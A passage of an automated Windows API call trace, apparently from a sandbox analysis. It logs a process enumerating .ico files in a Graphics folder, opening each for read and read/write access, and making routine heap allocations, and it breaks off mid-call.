[0062.013] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=41 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Print.ico") returned 41 [0062.013] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Print.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\print.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x47e)) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.013] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.013] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate1.ico", cAlternateFileName="")) returned 1 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0062.014] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.014] AreFileApisANSI () returned 1 [0062.014] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico", lpUsedDefaultChar=0x0) returned 43 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.014] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0062.015] AreFileApisANSI () returned 1 [0062.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.015] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.015] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0062.015] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.015] GetFileType (hFile=0x41c) returned 0x1 [0062.015] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.015] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.015] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.015] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.016] CloseHandle (hObject=0x41c) returned 1 [0062.016] AreFileApisANSI () returned 1 [0062.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0062.016] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.016] GetFileType (hFile=0x41c) returned 0x1 [0062.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.016] CloseHandle (hObject=0x41c) returned 1 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0062.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0062.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0062.016] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.016] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0062.017] AreFileApisANSI () returned 1 [0062.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.017] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67900 [0062.017] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dfc0, cbMultiByte=-1, lpWideCharStr=0x67900, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico") returned 43 [0062.017] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate1.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate1.ico"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e)) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67900 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0062.017] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xbd82ba00, ftCreationTime.dwHighDateTime=0x1ca2a28, ftLastAccessTime.dwLowDateTime=0xbd82ba00, ftLastAccessTime.dwHighDateTime=0x1ca2a28, ftLastWriteTime.dwLowDateTime=0xbd82ba00, ftLastWriteTime.dwHighDateTime=0x1ca2a28, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Rotate2.ico", cAlternateFileName="")) returned 1 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a98 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0062.018] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.018] AreFileApisANSI () returned 1 [0062.018] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico", lpUsedDefaultChar=0x0) returned 43 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0062.018] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0062.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0062.019] AreFileApisANSI () returned 1 [0062.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.019] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0062.019] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.019] GetFileType (hFile=0x41c) returned 0x1 [0062.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.019] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0062.019] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0062.020] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0062.020] CloseHandle (hObject=0x41c) returned 1 [0062.020] AreFileApisANSI () returned 1 [0062.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 43 [0062.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x56) returned 0x67540 [0062.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x67540, cchWideChar=43 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico") returned 43 [0062.020] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Graphics\\Rotate2.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate2.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0062.020] GetFileType (hFile=0x41c) returned 0x1 [0062.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x67540 | out: hHeap=0x20000) returned 1 [0062.020] CloseHandle (hObject=0x41c) returned 1 [0062.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0062.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0062.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0062.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0062.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0062.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0062.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0062.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0062.022] AreFileApisANSI () returned 1 [0062.022] MultiByteToWideChar (in: 